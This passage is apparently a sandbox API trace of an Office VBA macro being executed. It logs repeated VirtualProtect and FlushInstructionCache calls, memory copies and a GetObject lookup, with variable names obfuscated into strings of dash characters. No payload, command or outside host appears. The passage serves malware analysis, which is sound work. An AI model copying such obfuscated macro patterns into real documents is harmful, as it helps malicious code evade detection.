cchWideChar=23 | out: lpWideCharStr="––––——–———–—–—–—–—–––") returned 22 [0109.682] CRetailMalloc_Alloc () returned 0xca0f620 [0109.682] _mbscpy_s (in: _Dst=0xca0f620, _DstSizeInBytes=0x16, _Src=0x112b01ba | out: _Dst=0xca0f620) returned 0x0 [0109.682] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="_B_var_\x97\x96\x96\x97\x97\x97\x96\x97\x96\x96\x96\x97\x96\x96\x96\x96\x97\x96\x97\x96\x97", cchCount1=-1, lpString2="_B_var_\x96\x96\x96\x96\x97\x97\x96\x97\x97\x97\x96\x97\x96\x97\x96\x97\x96\x97\x96\x96\x96", cchCount2=-1) returned 3 [0109.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b0cb2, cbMultiByte=29, lpWideCharStr=0x197714, cchWideChar=30 | out: lpWideCharStr="_B_var_––––——–———–—–—–—–—–––") returned 29 [0109.682] _mbscpy_s (in: _Dst=0x19777c, _DstSizeInBytes=0x16, _Src=0x112b01ba | out: _Dst=0x19777c) returned 0x0 [0109.682] CRetailMalloc_Free () returned 0x1 [0109.682] memcpy (in: _Dst=0xcb65290, _Src=0xcb65290, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0109.682] memcpy (in: _Dst=0xcb65188, _Src=0x197888, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0109.682] memcpy (in: _Dst=0xcb65188, _Src=0x1976f4, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0109.683] memcpy (in: _Dst=0xcb65188, _Src=0x1976f4, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0109.683] memcpy (in: _Dst=0xcb65188, _Src=0x1976f4, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0109.683] memcpy (in: _Dst=0xcb65188, _Src=0x197888, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0109.683] memcpy (in: _Dst=0xcb65188, _Src=0x197888, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0109.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6936ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0109.684] memcpy (in: _Dst=0xca3d560, _Src=0x197924, _Size=0x18 | out: _Dst=0xca3d560) returned 0xca3d560 [0109.684] CRetailMalloc_Realloc () returned 0xca3d448 [0109.684] CRetailMalloc_Free () returned 0x1 [0109.684] GetCurrentProcess () returned 0xffffffff [0109.684] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789c, dwSize=0x14) returned 1 [0109.684] VirtualProtect (in: lpAddress=0xf5f789c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.685] GetCurrentProcess () returned 0xffffffff [0109.685] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789d, dwSize=0x2) returned 1 [0109.685] GetCurrentProcess () returned 0xffffffff [0109.685] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bc, dwSize=0x14) returned 1 [0109.685] VirtualProtect (in: lpAddress=0xf5f78bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.685] GetCurrentProcess () returned 0xffffffff [0109.685] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bd, dwSize=0x2) returned 1 [0109.685] GetCurrentProcess () returned 0xffffffff [0109.685] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dc, dwSize=0x14) returned 1 [0109.685] VirtualProtect (in: lpAddress=0xf5f78dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.686] GetCurrentProcess () returned 0xffffffff [0109.686] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dd, dwSize=0x2) returned 1 [0109.686] GetCurrentProcess () returned 0xffffffff [0109.686] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fc, dwSize=0x14) returned 1 [0109.686] VirtualProtect (in: lpAddress=0xf5f78fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.686] GetCurrentProcess () returned 0xffffffff [0109.687] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fd, dwSize=0x2) returned 1 [0109.687] GetCurrentProcess () returned 0xffffffff [0109.687] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791c, dwSize=0x14) returned 1 [0109.687] VirtualProtect (in: lpAddress=0xf5f791c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.687] GetCurrentProcess () returned 0xffffffff [0109.687] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791d, dwSize=0x2) returned 1 [0109.687] GetCurrentProcess () returned 0xffffffff [0109.687] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793c, dwSize=0x14) returned 1 [0109.687] VirtualProtect (in: lpAddress=0xf5f793c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.688] GetCurrentProcess () returned 0xffffffff [0109.688] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793d, dwSize=0x2) returned 1 [0109.688] GetCurrentProcess () returned 0xffffffff [0109.688] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795c, dwSize=0x14) returned 1 [0109.688] VirtualProtect (in: lpAddress=0xf5f795c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.688] GetCurrentProcess () returned 0xffffffff [0109.688] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795d, dwSize=0x2) returned 1 [0109.688] GetCurrentProcess () returned 0xffffffff [0109.688] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797c, dwSize=0x14) returned 1 [0109.688] VirtualProtect (in: lpAddress=0xf5f797c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.689] GetCurrentProcess () returned 0xffffffff [0109.689] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797d, dwSize=0x2) returned 1 [0109.689] GetCurrentProcess () returned 0xffffffff [0109.689] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799c, dwSize=0x14) returned 1 [0109.689] VirtualProtect (in: lpAddress=0xf5f799c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.690] GetCurrentProcess () returned 0xffffffff [0109.690] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799d, dwSize=0x2) returned 1 [0109.690] GetCurrentProcess () returned 0xffffffff [0109.690] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bc, dwSize=0x14) returned 1 [0109.690] VirtualProtect (in: lpAddress=0xf5f79bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.690] GetCurrentProcess () returned 0xffffffff [0109.690] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bd, dwSize=0x2) returned 1 [0109.691] GetCurrentProcess () returned 0xffffffff [0109.691] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dc, dwSize=0x14) returned 1 [0109.691] VirtualProtect (in: lpAddress=0xf5f79dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.691] GetCurrentProcess () returned 0xffffffff [0109.691] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dd, dwSize=0x2) returned 1 [0109.691] GetCurrentProcess () returned 0xffffffff [0109.691] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fc, dwSize=0x14) returned 1 [0109.691] VirtualProtect (in: lpAddress=0xf5f79fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.692] GetCurrentProcess () returned 0xffffffff [0109.692] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fd, dwSize=0x2) returned 1 [0109.692] GetCurrentProcess () returned 0xffffffff [0109.692] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737248, dwSize=0x14) returned 1 [0109.692] VirtualProtect (in: lpAddress=0xc737248, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.692] GetCurrentProcess () returned 0xffffffff [0109.692] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737249, dwSize=0x2) returned 1 [0109.692] GetCurrentProcess () returned 0xffffffff [0109.692] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737268, dwSize=0x14) returned 1 [0109.692] VirtualProtect (in: lpAddress=0xc737268, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.693] GetCurrentProcess () returned 0xffffffff [0109.693] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737269, dwSize=0x2) returned 1 [0109.693] GetCurrentProcess () returned 0xffffffff [0109.693] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737288, dwSize=0x14) returned 1 [0109.693] VirtualProtect (in: lpAddress=0xc737288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.694] GetCurrentProcess () returned 0xffffffff [0109.694] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737289, dwSize=0x2) returned 1 [0109.694] GetCurrentProcess () returned 0xffffffff [0109.694] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a8, dwSize=0x14) returned 1 [0109.694] VirtualProtect (in: lpAddress=0xc7372a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.694] GetCurrentProcess () returned 0xffffffff [0109.694] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a9, dwSize=0x2) returned 1 [0109.694] GetCurrentProcess () returned 0xffffffff [0109.694] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c8, dwSize=0x14) returned 1 [0109.694] VirtualProtect (in: lpAddress=0xc7372c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.695] GetCurrentProcess () returned 0xffffffff [0109.695] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c9, dwSize=0x2) returned 1 [0109.695] GetCurrentProcess () returned 0xffffffff [0109.695] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e8, dwSize=0x14) returned 1 [0109.695] VirtualProtect (in: lpAddress=0xc7372e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.696] GetCurrentProcess () returned 0xffffffff [0109.696] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e9, dwSize=0x2) returned 1 [0109.696] GetCurrentProcess () returned 0xffffffff [0109.696] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737308, dwSize=0x14) returned 1 [0109.696] VirtualProtect (in: lpAddress=0xc737308, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.696] GetCurrentProcess () returned 0xffffffff [0109.696] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737309, dwSize=0x2) returned 1 [0109.696] GetCurrentProcess () returned 0xffffffff [0109.696] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737328, dwSize=0x14) returned 1 [0109.696] VirtualProtect (in: lpAddress=0xc737328, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.697] GetCurrentProcess () returned 0xffffffff [0109.697] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737329, dwSize=0x2) returned 1 [0109.697] GetCurrentProcess () returned 0xffffffff [0109.697] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737348, dwSize=0x14) returned 1 [0109.697] VirtualProtect (in: lpAddress=0xc737348, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.697] GetCurrentProcess () returned 0xffffffff [0109.697] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737349, dwSize=0x2) returned 1 [0109.697] GetCurrentProcess () returned 0xffffffff [0109.697] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737368, dwSize=0x14) returned 1 [0109.697] VirtualProtect (in: lpAddress=0xc737368, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.698] GetCurrentProcess () returned 0xffffffff [0109.698] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737369, dwSize=0x2) returned 1 [0109.698] GetCurrentProcess () returned 0xffffffff [0109.698] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737388, dwSize=0x14) returned 1 [0109.698] VirtualProtect (in: lpAddress=0xc737388, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.699] GetCurrentProcess () returned 0xffffffff [0109.699] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737389, dwSize=0x2) returned 1 [0109.699] GetCurrentProcess () returned 0xffffffff [0109.699] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a8, dwSize=0x14) returned 1 [0109.699] VirtualProtect (in: lpAddress=0xc7373a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.699] GetCurrentProcess () returned 0xffffffff [0109.699] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a9, dwSize=0x2) returned 1 [0109.699] GetCurrentProcess () returned 0xffffffff [0109.699] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c8, dwSize=0x14) returned 1 [0109.699] VirtualProtect (in: lpAddress=0xc7373c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.700] GetCurrentProcess () returned 0xffffffff [0109.700] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c9, dwSize=0x2) returned 1 [0109.700] GetCurrentProcess () returned 0xffffffff [0109.700] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e8, dwSize=0x14) returned 1 [0109.700] VirtualProtect (in: lpAddress=0xc7373e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.701] GetCurrentProcess () returned 0xffffffff [0109.701] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e9, dwSize=0x2) returned 1 [0109.701] GetCurrentProcess () returned 0xffffffff [0109.701] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737408, dwSize=0x14) returned 1 [0109.701] VirtualProtect (in: lpAddress=0xc737408, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.701] GetCurrentProcess () returned 0xffffffff [0109.701] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737409, dwSize=0x2) returned 1 [0109.701] GetCurrentProcess () returned 0xffffffff [0109.701] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737428, dwSize=0x14) returned 1 [0109.701] VirtualProtect (in: lpAddress=0xc737428, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.702] GetCurrentProcess () returned 0xffffffff [0109.702] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737429, dwSize=0x2) returned 1 [0109.702] GetCurrentProcess () returned 0xffffffff [0109.702] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e78, dwSize=0x14) returned 1 [0109.702] VirtualProtect (in: lpAddress=0xc7c4e78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.702] GetCurrentProcess () returned 0xffffffff [0109.702] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e79, dwSize=0x2) returned 1 [0109.702] GetCurrentProcess () returned 0xffffffff [0109.702] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e98, dwSize=0x14) returned 1 [0109.702] VirtualProtect (in: lpAddress=0xc7c4e98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.703] GetCurrentProcess () returned 0xffffffff [0109.703] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e99, dwSize=0x2) returned 1 [0109.703] GetCurrentProcess () returned 0xffffffff [0109.703] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb8, dwSize=0x14) returned 1 [0109.703] VirtualProtect (in: lpAddress=0xc7c4eb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0109.703] GetCurrentProcess () returned 0xffffffff [0109.703] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb9, dwSize=0x2) returned 1 [0109.704] GetAsyncKeyState (vKey=3) returned 0 [0109.704] VarCmp (pvarLeft=0x197d34, pvarRight=0x197d24, lcid=0x0, dwFlags=0x30001) returned 0x2 [0109.704] VarCmp (pvarLeft=0x197d34, pvarRight=0x197d24, lcid=0x0, dwFlags=0x30001) returned 0x2 [0109.704] VarCmp (pvarLeft=0x197d34, pvarRight=0x197d24, lcid=0x0, dwFlags=0x30001) returned 0x2 [0109.704] VarCmp (pvarLeft=0x197d34, pvarRight=0x197d24, lcid=0x0, dwFlags=0x30001) returned 0x1 [0109.705] CRetailMalloc_Alloc () returned 0xca3d5d8 [0109.705] memcpy (in: _Dst=0xcb65188, _Src=0x197468, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0109.705] memcpy (in: _Dst=0xcb65290, _Src=0x197484, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0109.705] memcpy (in: _Dst=0xcb65188, _Src=0x197468, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0109.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11432f42, cbMultiByte=10, lpWideCharStr=0x197284, cchWideChar=11 | out: lpWideCharStr="GetObject") returned 10 [0109.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111d2e06, cbMultiByte=10, lpWideCharStr=0x1972e4, cchWideChar=11 | out: lpWideCharStr="GetObject") returned 10 [0109.711] memcpy (in: _Dst=0xcb65188, _Src=0x1972d4, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0109.711] memcpy (in: _Dst=0xcb65188, _Src=0x197468, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0109.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11432f6a, cbMultiByte=32, lpWideCharStr=0x197284, cchWideChar=33 | out: lpWideCharStr="——–———————––———–––——––———–—–———") returned 32 [0109.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111d2dca, cbMultiByte=32, lpWideCharStr=0x1972e4, cchWideChar=33 | out: lpWideCharStr="——–———————––———–––——––———–—–———") returned 32 [0109.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111d2dca, cbMultiByte=32, lpWideCharStr=0x1972e4, cchWideChar=33 | out: lpWideCharStr="——–———————––———–––——––———–—–———") returned 32 [0109.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111d2dca, cbMultiByte=32, lpWideCharStr=0x1972e4, cchWideChar=33 | out: lpWideCharStr="——–———————––———–––——––———–—–———") returned 32 [0109.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111d2dca, cbMultiByte=32, lpWideCharStr=0x1972e4, cchWideChar=33 | out: lpWideCharStr="——–———————––———–––——––———–—–———") returned 32 [0109.712] CRetailMalloc_Alloc () returned 0xb3bc558 [0109.712] _mbscpy_s (in: _Dst=0xb3bc558, _DstSizeInBytes=0x20, _Src=0x111d2dca | out: _Dst=0xb3bc558) returned 0x0 [0109.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b0cee, cbMultiByte=39, lpWideCharStr=0x1972f4, cchWideChar=40 | out: lpWideCharStr="_B_var_——–———————––———–––——––———–—–———") returned 39 [0109.713] _mbscpy_s (in: _Dst=0x19735c, _DstSizeInBytes=0x20, _Src=0x111d2dca | out: _Dst=0x19735c) returned 0x0 [0109.713] CRetailMalloc_Free () returned 0x1 [0109.713] memcpy (in: _Dst=0xcb65290, _Src=0xcb65290, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0109.713] memcpy (in: _Dst=0xcb65188, _Src=0x197468, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0109.713] memcpy (in: _Dst=0xcb6518c, _Src=0x197468, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0109.713] memcpy (in: _Dst=0xcb65188, _Src=0x1972d4, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0109.713] memcpy (in: _Dst=0xcb65188, _Src=0x1972d4, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0109.713] memcpy (in: _Dst=0xcb65188, _Src=0x197468, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0109.713] memcpy (in: _Dst=0xcb65188, _Src=0x197468, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0109.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6936ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0109.713] memcpy (in: _Dst=0xca3d658, _Src=0x197504, _Size=0x18 | out: _Dst=0xca3d658) returned 0xca3d658 [0109.713] CRetailMalloc_Realloc () returned 0xca3d5d8 [0109.714] CRetailMalloc_Free () returned 0x1 [0109.714] GetCurrentProcess () returned 0xffffffff [0109.714] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789c, dwSize=0x14) returned 1 [0109.714] VirtualProtect (in: lpAddress=0xf5f789c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.714] GetCurrentProcess () returned 0xffffffff [0109.714] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789d, dwSize=0x2) returned 1 [0109.714] GetCurrentProcess () returned 0xffffffff [0109.714] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bc, dwSize=0x14) returned 1 [0109.715] VirtualProtect (in: lpAddress=0xf5f78bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.715] GetCurrentProcess () returned 0xffffffff [0109.715] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bd, dwSize=0x2) returned 1 [0109.715] GetCurrentProcess () returned 0xffffffff [0109.715] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dc, dwSize=0x14) returned 1 [0109.715] VirtualProtect (in: lpAddress=0xf5f78dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.716] GetCurrentProcess () returned 0xffffffff [0109.716] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dd, dwSize=0x2) returned 1 [0109.716] GetCurrentProcess () returned 0xffffffff [0109.716] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fc, dwSize=0x14) returned 1 [0109.716] VirtualProtect (in: lpAddress=0xf5f78fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.716] GetCurrentProcess () returned 0xffffffff [0109.716] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fd, dwSize=0x2) returned 1 [0109.716] GetCurrentProcess () returned 0xffffffff [0109.716] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791c, dwSize=0x14) returned 1 [0109.716] VirtualProtect (in: lpAddress=0xf5f791c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.717] GetCurrentProcess () returned 0xffffffff [0109.717] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791d, dwSize=0x2) returned 1 [0109.717] GetCurrentProcess () returned 0xffffffff [0109.717] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793c, dwSize=0x14) returned 1 [0109.717] VirtualProtect (in: lpAddress=0xf5f793c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.717] GetCurrentProcess () returned 0xffffffff [0109.717] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793d, dwSize=0x2) returned 1 [0109.717] GetCurrentProcess () returned 0xffffffff [0109.717] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795c, dwSize=0x14) returned 1 [0109.718] VirtualProtect (in: lpAddress=0xf5f795c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.718] GetCurrentProcess () returned 0xffffffff [0109.718] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795d, dwSize=0x2) returned 1 [0109.718] GetCurrentProcess () returned 0xffffffff [0109.718] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797c, dwSize=0x14) returned 1 [0109.718] VirtualProtect (in: lpAddress=0xf5f797c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.719] GetCurrentProcess () returned 0xffffffff [0109.719] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797d, dwSize=0x2) returned 1 [0109.719] GetCurrentProcess () returned 0xffffffff [0109.719] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799c, dwSize=0x14) returned 1 [0109.719] VirtualProtect (in: lpAddress=0xf5f799c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.719] GetCurrentProcess () returned 0xffffffff [0109.719] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799d, dwSize=0x2) returned 1 [0109.719] GetCurrentProcess () returned 0xffffffff [0109.719] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bc, dwSize=0x14) returned 1 [0109.719] VirtualProtect (in: lpAddress=0xf5f79bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.720] GetCurrentProcess () returned 0xffffffff [0109.720] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bd, dwSize=0x2) returned 1 [0109.720] GetCurrentProcess () returned 0xffffffff [0109.720] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dc, dwSize=0x14) returned 1 [0109.720] VirtualProtect (in: lpAddress=0xf5f79dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.720] GetCurrentProcess () returned 0xffffffff [0109.720] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dd, dwSize=0x2) returned 1 [0109.720] GetCurrentProcess () returned 0xffffffff [0109.720] FlushInstructionCache (hProcess=0xffffffff, 